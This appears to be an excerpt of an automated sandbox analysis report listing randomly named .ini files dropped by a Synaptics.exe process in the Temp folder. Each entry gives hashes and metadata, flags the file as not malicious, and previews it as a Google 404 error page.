                                                                                                                                                      SHA-512:CDBE8E00733D50C5C5FF6D97C0807A27230A1C76857AD62101CBFA8B068D63E49DADB37E1664A364BA6CA7A25AAE1878B60BD795BF56C6C1B4712D695C180592
                                                                                                                                                      Malicious:false
                                                                                                                                                      Preview:<html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="3SODsHd-AdjcS7xpjF_pwQ">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;padding:30px 0 15px;}* > body{background:url(//www.google.com/images/errors/robot.png) 100% 5px no-repeat;padding-right:205px}p{margin:11px 0 22px;overflow:hidden}pre{white-space:pre-wrap;}ins{color:#777;text-decoration:none}a img{border:0}@media screen and (max-width:772px){body{background:none;margin-top:0;max-width:none;padding-right:0}}#logo{background:url(//www.google.com/images/branding/googlelogo/1x/googlelogo_color_150x54dp.png) no-repeat;margin-left:-5px}@media only screen and (min-resolution:192dpi){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x5

                                                                                                                                                      C:\Users\user\AppData\Local\Temp\WIwXxSt.ini

                                                                                                                                                      Download File
                                                                                                                                                      Process:C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                      File Type:HTML document, Unicode text, UTF-8 text, with very long lines (1648), with no line terminators
                                                                                                                                                      Category:dropped
                                                                                                                                                      Size (bytes):1652
                                                                                                                                                      Entropy (8bit):5.267593245664725
                                                                                                                                                      Encrypted:false
                                                                                                                                                      SSDEEP:24:GgsF+0gSU6pepPQfkZbc6cn1BZdAe1nCr1LTHm6D9viLRIxv+5A:GgK+L+pAZewRDK4mW
                                                                                                                                                      MD5:1CD110740ECEBF7E06C753C081F3CAE5
                                                                                                                                                      SHA1:818ED905B6988CE842974001A2E999A6264605F4
                                                                                                                                                      SHA-256:8CBF387B9F9C65DCB878BC71662B586248C87094C091F14574FD2967EAFE2AAF
                                                                                                                                                      SHA-512:1A3092059FCC2FCEBEA68FD5C3F62B61CA3230E772E8883A82EF5680E47D080709123AD898929409E332BDB0FEF265484CBFF11E32A7571D22D255270E6EDD51
                                                                                                                                                      Malicious:false
                                                                                                                                                      Preview:<html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="pszuRFFq1yDdbM_6i6KLUQ">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;padding:30px 0 15px;}* > body{background:url(//www.google.com/images/errors/robot.png) 100% 5px no-repeat;padding-right:205px}p{margin:11px 0 22px;overflow:hidden}pre{white-space:pre-wrap;}ins{color:#777;text-decoration:none}a img{border:0}@media screen and (max-width:772px){body{background:none;margin-top:0;max-width:none;padding-right:0}}#logo{background:url(//www.google.com/images/branding/googlelogo/1x/googlelogo_color_150x54dp.png) no-repeat;margin-left:-5px}@media only screen and (min-resolution:192dpi){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x5

                                                                                                                                                      C:\Users\user\AppData\Local\Temp\WeajLNP.ini

                                                                                                                                                      Download File
                                                                                                                                                      Process:C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                      File Type:HTML document, Unicode text, UTF-8 text, with very long lines (1648), with no line terminators
                                                                                                                                                      Category:dropped
                                                                                                                                                      Size (bytes):1652
                                                                                                                                                      Entropy (8bit):5.263845096187329
                                                                                                                                                      Encrypted:false
                                                                                                                                                      SSDEEP:24:GgsF+07SU6pepPQfkZbc6cn1BZdAe1nCr1LTHm6D9viLRIxv+5A:GgK+o+pAZewRDK4mW
                                                                                                                                                      MD5:0CE19284CA5AB40C56459D2C79B11A10
                                                                                                                                                      SHA1:2561B7D717BE66584F81AAE7D06A70570BED539B
                                                                                                                                                      SHA-256:D353589A3A800104E09506DF18DA7011AA19131A6E7F69FD56DAFBC5F5F73BEE
                                                                                                                                                      SHA-512:593EEF1FFC7D2C3B0F5B60ADA40253A051A82CE74F790D35FD0B934F7335CD7DCBC15AAF7A402B32F87B6EDC5D19A327A98A42831CE04D8450E887AAAB22EA99
                                                                                                                                                      Malicious:false
                                                                                                                                                      Preview:<html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="9pgXHaCIrcfOwHOjN--IWw">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;padding:30px 0 15px;}* > body{background:url(//www.google.com/images/errors/robot.png) 100% 5px no-repeat;padding-right:205px}p{margin:11px 0 22px;overflow:hidden}pre{white-space:pre-wrap;}ins{color:#777;text-decoration:none}a img{border:0}@media screen and (max-width:772px){body{background:none;margin-top:0;max-width:none;padding-right:0}}#logo{background:url(//www.google.com/images/branding/googlelogo/1x/googlelogo_color_150x54dp.png) no-repeat;margin-left:-5px}@media only screen and (min-resolution:192dpi){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x5

                                                                                                                                                      C:\Users\user\AppData\Local\Temp\ZUlwgHN.ini

                                                                                                                                                      Download File
                                                                                                                                                      Process:C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                      File Type:HTML document, Unicode text, UTF-8 text, with very long lines (1648), with no line terminators
                                                                                                                                                      Category:dropped
                                                                                                                                                      Size (bytes):1652
                                                                                                                                                      Entropy (8bit):5.2843798526874215
                                                                                                                                                      Encrypted:false
                                                                                                                                                      SSDEEP:24:GgsF+0LSU6pepPQfkZbc6cn1BZdAe1nCr1LTHm6D9viLRIxv+5A:GgK+M+pAZewRDK4mW
                                                                                                                                                      MD5:A8753107D5D9C9031C64A807D0CA7618
                                                                                                                                                      SHA1:D6EEC54A59034D735BE550B9A6CA0CEB0A6F6F1A
                                                                                                                                                      SHA-256:096C040940BA70A777CFADFCC10FA855FE89A74A1DE8834062F417201A6BA2DE
                                                                                                                                                      SHA-512:BCC4CE082A33352E24C88CD4C4743BD0125B386BE55072308E9110AD688C1AE9E9B135AB2860364F8D04A9D713C9748EEAC52F0B3BD60675163D525C24F7ED44
                                                                                                                                                      Malicious:false
                                                                                                                                                      Preview:<html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="OMFYDgOVD398W6jdJ_68bA">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;padding:30px 0 15px;}* > body{background:url(//www.google.com/images/errors/robot.png) 100% 5px no-repeat;padding-right:205px}p{margin:11px 0 22px;overflow:hidden}pre{white-space:pre-wrap;}ins{color:#777;text-decoration:none}a img{border:0}@media screen and (max-width:772px){body{background:none;margin-top:0;max-width:none;padding-right:0}}#logo{background:url(//www.google.com/images/branding/googlelogo/1x/googlelogo_color_150x54dp.png) no-repeat;margin-left:-5px}@media only screen and (min-resolution:192dpi){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x5

                                                                                                                                                      C:\Users\user\AppData\Local\Temp\aNXrGGd.ini

                                                                                                                                                      Download File
                                                                                                                                                      Process:C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                      File Type:HTML document, Unicode text, UTF-8 text, with very long lines (1648), with no line terminators
                                                                                                                                                      Category:dropped
                                                                                                                                                      Size (bytes):1652
                                                                                                                                                      Entropy (8bit):5.271655794465192
                                                                                                                                                      Encrypted:false
                                                                                                                                                      SSDEEP:24:GgsF+06XDSU6pepPQfkZbc6cn1BZdAe1nCr1LTHm6D9viLRIxv+5A:GgK+1z+pAZewRDK4mW
                                                                                                                                                      MD5:CD4C37E937A931F5E2A882BC7AA6B067
                                                                                                                                                      SHA1:8B9A51BF2D99D46B74D9E66778A5D573EADE84C1
                                                                                                                                                      SHA-256:B6E47E6BF904E8ABB28FA4D8BE2CAA11F864CCF41D005AB36DF063B2A2A8E989
                                                                                                                                                      SHA-512:DB58BB4D209ACBA272DF5CBBB030CBEB566CE9A1D0725B303802290025FED3723C347A86D0E47553BADAFAE3902FC8A4F35E8D96F01472666E3370435EF16FD3
                                                                                                                                                      Malicious:false
                                                                                                                                                      Preview:<html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="jN5jAEk9_2S8oBGZAmtClQ">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;padding:30px 0 15px;}* > body{background:url(//www.google.com/images/errors/robot.png) 100% 5px no-repeat;padding-right:205px}p{margin:11px 0 22px;overflow:hidden}pre{white-space:pre-wrap;}ins{color:#777;text-decoration:none}a img{border:0}@media screen and (max-width:772px){body{background:none;margin-top:0;max-width:none;padding-right:0}}#logo{background:url(//www.google.com/images/branding/googlelogo/1x/googlelogo_color_150x54dp.png) no-repeat;margin-left:-5px}@media only screen and (min-resolution:192dpi){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x5

                                                                                                                                                      C:\Users\user\AppData\Local\Temp\aSbVlID.ini

                                                                                                                                                      Download File
                                                                                                                                                      Process:C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                      File Type:HTML document, Unicode text, UTF-8 text, with very long lines (1648), with no line terminators
                                                                                                                                                      Category:dropped
                                                                                                                                                      Size (bytes):1652
                                                                                                                                                      Entropy (8bit):5.251762009837091
                                                                                                                                                      Encrypted:false
                                                                                                                                                      SSDEEP:24:GgsF+0rLtozSU6pepPQfkZbc6cn1BZdAe1nCr1LTHm6D9viLRIxv+5A:GgK+Jz+pAZewRDK4mW
                                                                                                                                                      MD5:BAA57AA6E3D923A4DE3495E489EDF14E
                                                                                                                                                      SHA1:4534823A3A7AC097E52A5D4F3A276204EBF1F4F5
                                                                                                                                                      SHA-256:A66B87B05BBA783B492AFC9C32179B3C88D2F8A6593271BA66A59226D44DEC6D
                                                                                                                                                      SHA-512:227429642351B4964333790AFEFC25F109ABD69E4DACFC071DF6A3947206029DFD56A4179ED327A76B9A7326D39F269CFE56F3A33E6C2022FC6BA330B5455641
                                                                                                                                                      Malicious:false
                                                                                                                                                      Preview:<html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="p8HvoBLfqJuPhwrbEihtfg">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;padding:30px 0 15px;}* > body{background:url(//www.google.com/images/errors/robot.png) 100% 5px no-repeat;padding-right:205px}p{margin:11px 0 22px;overflow:hidden}pre{white-space:pre-wrap;}ins{color:#777;text-decoration:none}a img{border:0}@media screen and (max-width:772px){body{background:none;margin-top:0;max-width:none;padding-right:0}}#logo{background:url(//www.google.com/images/branding/googlelogo/1x/googlelogo_color_150x54dp.png) no-repeat;margin-left:-5px}@media only screen and (min-resolution:192dpi){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x5

                                                                                                                                                      C:\Users\user\AppData\Local\Temp\aZGnnF5.ini

                                                                                                                                                      Download File
                                                                                                                                                      Process:C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                      File Type:HTML document, Unicode text, UTF-8 text, with very long lines (1648), with no line terminators
                                                                                                                                                      Category:dropped
                                                                                                                                                      Size (bytes):1652
                                                                                                                                                      Entropy (8bit):5.270386565027192
                                                                                                                                                      Encrypted:false
                                                                                                                                                      SSDEEP:24:GgsF+0yvbSU6pepPQfkZbc6cn1BZdAe1nCr1LTHm6D9viLRIxv+5A:GgK+Tb+pAZewRDK4mW
                                                                                                                                                      MD5:414E544B6343FEA1538D88810D6E35AB
                                                                                                                                                      SHA1:673DC60E7A74D574827070B38A547AEA871B3CCA
                                                                                                                                                      SHA-256:9D8BE203AEDA8E5F5F19687961811B5D98ED00E178F95DF58946B0637E363FEA
                                                                                                                                                      SHA-512:DB46313F6B9A1C3278D255B7B6F44377873859E06162D6E150E5115F433084B91A6424F086C1A6F68B909F05A8892351C3B4DA5954FB9F7F8836D8DFDF908723
                                                                                                                                                      Malicious:false
                                                                                                                                                      Preview:<html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="fEXPO0UUj5Vy1DoFj1QDdw">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;padding:30px 0 15px;}* > body{background:url(//www.google.com/images/errors/robot.png) 100% 5px no-repeat;padding-right:205px}p{margin:11px 0 22px;overflow:hidden}pre{white-space:pre-wrap;}ins{color:#777;text-decoration:none}a img{border:0}@media screen and (max-width:772px){body{background:none;margin-top:0;max-width:none;padding-right:0}}#logo{background:url(//www.google.com/images/branding/googlelogo/1x/googlelogo_color_150x54dp.png) no-repeat;margin-left:-5px}@media only screen and (min-resolution:192dpi){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x5

                                                                                                                                                      C:\Users\user\AppData\Local\Temp\bXBws9d.ini

                                                                                                                                                      Download File
                                                                                                                                                      Process:C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                      File Type:HTML document, Unicode text, UTF-8 text, with very long lines (1648), with no line terminators
                                                                                                                                                      Category:dropped
                                                                                                                                                      Size (bytes):1652
                                                                                                                                                      Entropy (8bit):5.254862930315009
                                                                                                                                                      Encrypted:false
                                                                                                                                                      SSDEEP:24:GgsF+0gGISU6pepPQfkZbc6cn1BZdAe1nCr1LTHm6D9viLRIxv+5A:GgK+XGI+pAZewRDK4mW
                                                                                                                                                      MD5:D7681B7AC41815F5FCD02A6A58433BA5
                                                                                                                                                      SHA1:1820AEB0B864C48A410E0BC56D12E20F12ECECDC
                                                                                                                                                      SHA-256:3F204D0EF7D81CF8F22A796BD18732F39F8BDA20B87004FFF8DCCD026545AE97
                                                                                                                                                      SHA-512:6075C8AB74C5BAB3CC605590869E5DB5198BE4C350DF27601B29482D28E1EA4B3CD9A325C0CA920749C2AB6548FD29DFD6B89DB2EE982963ED3B322077C77436
                                                                                                                                                      Malicious:false
                                                                                                                                                      Preview:<html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="_i5OPGft3nlL8FSf-kCrhw">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;padding:30px 0 15px;}* > body{background:url(//www.google.com/images/errors/robot.png) 100% 5px no-repeat;padding-right:205px}p{margin:11px 0 22px;overflow:hidden}pre{white-space:pre-wrap;}ins{color:#777;text-decoration:none}a img{border:0}@media screen and (max-width:772px){body{background:none;margin-top:0;max-width:none;padding-right:0}}#logo{background:url(//www.google.com/images/branding/googlelogo/1x/googlelogo_color_150x54dp.png) no-repeat;margin-left:-5px}@media only screen and (min-resolution:192dpi){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x5

                                                                                                                                                      C:\Users\user\AppData\Local\Temp\hT8ysaF.ini

                                                                                                                                                      Download File
                                                                                                                                                      Process:C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                      File Type:HTML document, Unicode text, UTF-8 text, with very long lines (1648), with no line terminators
                                                                                                                                                      Category:dropped
                                                                                                                                                      Size (bytes):1652
                                                                                                                                                      Entropy (8bit):5.261032908279517
                                                                                                                                                      Encrypted:false
                                                                                                                                                      SSDEEP:24:GgsF+0SSU6pepPQfkZbc6cn1BZdAe1nCr1LTHm6D9viLRIxv+5A:GgK+5+pAZewRDK4mW
                                                                                                                                                      MD5:AA0B4B61DD1BB5A52B20D5DE9EC18185
                                                                                                                                                      SHA1:F9CEDB9D6A7D829CD7963994E54434475DBFB6B7
                                                                                                                                                      SHA-256:4DC951926D6AE25462279EE6CAE565E52C8C2A661F1C10A460914A32ED5FAC20
                                                                                                                                                      SHA-512:85063D1788D584E7C02CEAB568D8CDA0D2D23E9AD36DBC4A556BF9CD11D791F7BD27C9B07CC6A69B62AF1224B3220AC32C8004128B630C627AA9E59D2E792B89
                                                                                                                                                      Malicious:false
                                                                                                                                                      Preview:<html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="Z9gJT4l3SWNJ5pwVgHnlHw">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;padding:30px 0 15px;}* > body{background:url(//www.google.com/images/errors/robot.png) 100% 5px no-repeat;padding-right:205px}p{margin:11px 0 22px;overflow:hidden}pre{white-space:pre-wrap;}ins{color:#777;text-decoration:none}a img{border:0}@media screen and (max-width:772px){body{background:none;margin-top:0;max-width:none;padding-right:0}}#logo{background:url(//www.google.com/images/branding/googlelogo/1x/googlelogo_color_150x54dp.png) no-repeat;margin-left:-5px}@media only screen and (min-resolution:192dpi){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x5

                                                                                                                                                      C:\Users\user\AppData\Local\Temp\ntiQOPQ.ini

                                                                                                                                                      Download File
                                                                                                                                                      Process:C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                      File Type:HTML document, Unicode text, UTF-8 text, with very long lines (1648), with no line terminators
                                                                                                                                                      Category:dropped
                                                                                                                                                      Size (bytes):1652
                                                                                                                                                      Entropy (8bit):5.2598528291361735
                                                                                                                                                      Encrypted:false
                                                                                                                                                      SSDEEP:24:GgsF+0qzSU6pepPQfkZbc6cn1BZdAe1nCr1LTHm6D9viLRIxv+5A:GgK+5+pAZewRDK4mW
                                                                                                                                                      MD5:CD2C27F4DB22B6E39A6CF2A03C0E498A
                                                                                                                                                      SHA1:1AFB78B15D40105634741B07D50435A2B39A1CC8
                                                                                                                                                      SHA-256:88AA23960853C28848270E1FF75A24A94C77227CD9F3AB2F8188EACC7C80AD72
                                                                                                                                                      SHA-512:2B51028D8365D2A9F6679AAC6D664C3FB84AC990B03267D2C8F86371057257AE34C7F2AB56C2543C1E0EF4199D28C26EF11B84E6B0B3DA1B6D1242E8097451FC
                                                                                                                                                      Malicious:false
                                                                                                                                                      Preview:<html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="cEwMp3MnqqJveVtrRTz4Sw">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;padding:30px 0 15px;}* > body{background:url(//www.google.com/images/errors/robot.png) 100% 5px no-repeat;padding-right:205px}p{margin:11px 0 22px;overflow:hidden}pre{white-space:pre-wrap;}ins{color:#777;text-decoration:none}a img{border:0}@media screen and (max-width:772px){body{background:none;margin-top:0;max-width:none;padding-right:0}}#logo{background:url(//www.google.com/images/branding/googlelogo/1x/googlelogo_color_150x54dp.png) no-repeat;margin-left:-5px}@media only screen and (min-resolution:192dpi){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x5

                                                                                                                                                      C:\Users\user\AppData\Local\Temp\qeUyHag.ini

                                                                                                                                                      Download File
                                                                                                                                                      Process:C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                      File Type:HTML document, Unicode text, UTF-8 text, with very long lines (1648), with no line terminators
                                                                                                                                                      Category:dropped
                                                                                                                                                      Size (bytes):1652
                                                                                                                                                      Entropy (8bit):5.2565590488292875
                                                                                                                                                      Encrypted:false
                                                                                                                                                      SSDEEP:24:GgsF+0KSU6pepPQfkZbc6cn1BZdAe1nCr1LTHm6D9viLRIxv+5A:GgK+B+pAZewRDK4mW
                                                                                                                                                      MD5:792D30D9A5A90E9D40887FF688DDA41D
                                                                                                                                                      SHA1:24395FD308DBA7657AACE029F7434DC6A1B713DB
                                                                                                                                                      SHA-256:92BD5DCFE3921985BD8D431F748402C6DA56369EE31AFE3166D982FF16B13D5B
                                                                                                                                                      SHA-512:07DFD200908626113CDE0A49CA7FDFCB514C7623207972F2039D874944EEF5B2E4709F4E47EA7037F9E0850D41C072FE3E3ACA80524E5B5999CA57FF482871CA
                                                                                                                                                      Malicious:false
                                                                                                                                                      Preview:<html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="dka1aF_5fYq0cGNJ7lWjJg">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;padding:30px 0 15px;}* > body{background:url(//www.google.com/images/errors/robot.png) 100% 5px no-repeat;padding-right:205px}p{margin:11px 0 22px;overflow:hidden}pre{white-space:pre-wrap;}ins{color:#777;text-decoration:none}a img{border:0}@media screen and (max-width:772px){body{background:none;margin-top:0;max-width:none;padding-right:0}}#logo{background:url(//www.google.com/images/branding/googlelogo/1x/googlelogo_color_150x54dp.png) no-repeat;margin-left:-5px}@media only screen and (min-resolution:192dpi){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x5

                                                                                                                                                      C:\Users\user\AppData\Local\Temp\qqEYEyJ.ini

                                                                                                                                                      Download File
                                                                                                                                                      Process:C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                      File Type:HTML document, Unicode text, UTF-8 text, with very long lines (1648), with no line terminators
                                                                                                                                                      Category:dropped
                                                                                                                                                      Size (bytes):1652
                                                                                                                                                      Entropy (8bit):5.2792533561180095
                                                                                                                                                      Encrypted:false
                                                                                                                                                      SSDEEP:24:GgsF+0mGSU6pepPQfkZbc6cn1BZdAe1nCr1LTHm6D9viLRIxv+5A:GgK+6+pAZewRDK4mW
                                                                                                                                                      MD5:176366D743F8489FBAD1D2A653E3E46C
                                                                                                                                                      SHA1:09FF3EB8BBBA7668B50FBE50D8EDE7C33B260C75
                                                                                                                                                      SHA-256:49226BD7E08071D5CF2115F38306E1247DEECF6B601E77D7DBAFF657976A7D42
                                                                                                                                                      SHA-512:1FF6BCF61414B991A86A467E54FB52E78F882788D60CEA109E4AF5E4C06EC98D34D97364BEF4394EB3518FB4EA891FD1FBEEC622A1E9B1000E5D6BB6AF028B82
                                                                                                                                                      Malicious:false
                                                                                                                                                      Preview:<html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="TO7QSPckHkLAJt6RwFEZuA">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;padding:30px 0 15px;}* > body{background:url(//www.google.com/images/errors/robot.png) 100% 5px no-repeat;padding-right:205px}p{margin:11px 0 22px;overflow:hidden}pre{white-space:pre-wrap;}ins{color:#777;text-decoration:none}a img{border:0}@media screen and (max-width:772px){body{background:none;margin-top:0;max-width:none;padding-right:0}}#logo{background:url(//www.google.com/images/branding/googlelogo/1x/googlelogo_color_150x54dp.png) no-repeat;margin-left:-5px}@media only screen and (min-resolution:192dpi){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x5

                                                                                                                                                      C:\Users\user\AppData\Local\Temp\t4SGQTi.ini

                                                                                                                                                      Download File
                                                                                                                                                      Process:C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                      File Type:HTML document, Unicode text, UTF-8 text, with very long lines (1648), with no line terminators
                                                                                                                                                      Category:dropped
                                                                                                                                                      Size (bytes):1652
                                                                                                                                                      Entropy (8bit):5.2484118086867015
                                                                                                                                                      Encrypted:false
                                                                                                                                                      SSDEEP:24:GgsF+0w7SU6pepPQfkZbc6cn1BZdAe1nCr1LTHm6D9viLRIxv+5A:GgK+n+pAZewRDK4mW
                                                                                                                                                      MD5:FFE518C9E1F71BC14F7AB6FFDF69895E
                                                                                                                                                      SHA1:7DEDD0D7A9852720155E11468EF24D84F2E4B526
                                                                                                                                                      SHA-256:B527BD3317A699C5F36B58F0748D08138DB24D5E32B9D064F69407E7E8505790
                                                                                                                                                      SHA-512:78FFDAA71718028780D13A34B81BDF5B25027B8556274D06C3580481CEEE06278247CA90D0D160813219863865A6589E419370E369D7E7264B4C4F90D938835E
                                                                                                                                                      Malicious:false
                                                                                                                                                      Preview:<html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="RrNTMnmoyFeseWrajDg5qw">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;padding:30px 0 15px;}* > body{background:url(//www.google.com/images/errors/robot.png) 100% 5px no-repeat;padding-right:205px}p{margin:11px 0 22px;overflow:hidden}pre{white-space:pre-wrap;}ins{color:#777;text-decoration:none}a img{border:0}@media screen and (max-width:772px){body{background:none;margin-top:0;max-width:none;padding-right:0}}#logo{background:url(//www.google.com/images/branding/googlelogo/1x/googlelogo_color_150x54dp.png) no-repeat;margin-left:-5px}@media only screen and (min-resolution:192dpi){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x5

                                                                                                                                                      C:\Users\user\AppData\Local\Temp\tFyT4WF.ini

                                                                                                                                                      Download File
                                                                                                                                                      Process:C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                      File Type:HTML document, Unicode text, UTF-8 text, with very long lines (1648), with no line terminators
                                                                                                                                                      Category:dropped
                                                                                                                                                      Size (bytes):1652
                                                                                                                                                      Entropy (8bit):5.2565454165552135
                                                                                                                                                      Encrypted:false
                                                                                                                                                      SSDEEP:24:GgsF+05cXDSU6pepPQfkZbc6cn1BZdAe1nCr1LTHm6D9viLRIxv+5A:GgK+GQD+pAZewRDK4mW
                                                                                                                                                      MD5:085DD07149A52F7C14D07660B4810F61
                                                                                                                                                      SHA1:3A9F214662032D27542F5322AE46311893E51323
                                                                                                                                                      SHA-256:37589CC5FB682F546047E518BE0663E103B114CBE9B6FCCCE68F63E4D04F81EA
                                                                                                                                                      SHA-512:FAF5F2E4F21CF912CD72917C6ADB5D81121648A0D6CFF8844434FC5C57129E7A20967AABBAFBC7BA2A09DCB0C788E7C9C3E07C0AF43F440A13577E2CBBCDD3E7
                                                                                                                                                      Malicious:false
                                                                                                                                                      Preview:<html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="-bJh4oQuKQtz3Y1P0eYJgw">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;padding:30px 0 15px;}* > body{background:url(//www.google.com/images/errors/robot.png) 100% 5px no-repeat;padding-right:205px}p{margin:11px 0 22px;overflow:hidden}pre{white-space:pre-wrap;}ins{color:#777;text-decoration:none}a img{border:0}@media screen and (max-width:772px){body{background:none;margin-top:0;max-width:none;padding-right:0}}#logo{background:url(//www.google.com/images/branding/googlelogo/1x/googlelogo_color_150x54dp.png) no-repeat;margin-left:-5px}@media only screen and (min-resolution:192dpi){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x5

                                                                                                                                                      C:\Users\user\AppData\Local\Temp\toWk6y3.ini

                                                                                                                                                      Download File
                                                                                                                                                      Process:C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                      File Type:HTML document, Unicode text, UTF-8 text, with very long lines (1648), with no line terminators
                                                                                                                                                      Category:dropped
                                                                                                                                                      Size (bytes):1652
                                                                                                                                                      Entropy (8bit):5.262435463444962
                                                                                                                                                      Encrypted:false
                                                                                                                                                      SSDEEP:24:GgsF+0OczSU6pepPQfkZbc6cn1BZdAe1nCr1LTHm6D9viLRIxv+5A:GgK+Vi+pAZewRDK4mW
                                                                                                                                                      MD5:B25443D7F2D0BA72410C15F8E9DD961C
                                                                                                                                                      SHA1:22E002E8F12D43432ABB63576C43006229F29D7D
                                                                                                                                                      SHA-256:9546EBBEB6CC83B059B9F8A69C9D7795386F9405CBE158B070E40E7AB1358D4B
                                                                                                                                                      SHA-512:B43DD4347EEB1CF051988C6342A89E6FF12F05A5E64774CC2869FF0A17CA586276DEC6913FDD6B2DCD8EF03DE7A624746911E8D5331DD0E5478400AE0BB0BA67
                                                                                                                                                      Malicious:false
